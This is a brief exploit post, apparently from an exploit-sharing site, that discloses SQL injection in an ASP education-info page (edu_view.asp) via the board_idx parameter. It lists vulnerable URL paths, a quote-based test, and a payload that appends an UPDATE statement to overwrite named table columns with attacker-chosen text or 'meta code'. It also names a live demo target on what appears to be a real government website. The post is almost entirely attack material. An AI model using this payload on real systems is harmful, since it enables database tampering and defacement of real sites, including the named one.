Education_info/edu_view.asp sql injection
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam all members thx 3APA3A
spec.note : "Live The Life"
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
1-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=(sql methot)
1-) example.com/info/edu_view.asp?kooboon=&gotopage=&board_idx=(sql methot)
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
2-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=1'
2-) example.com/[patch]/edu_view.asp?kooboon=&gotopage=&board_idx=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
#tbl : du_project_2006
#column : edu_area,edu_name
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
demo site : http://edu.cheoingu.go.kr/info/edu_view.asp?kooboon=&gotopage=&board_idx=174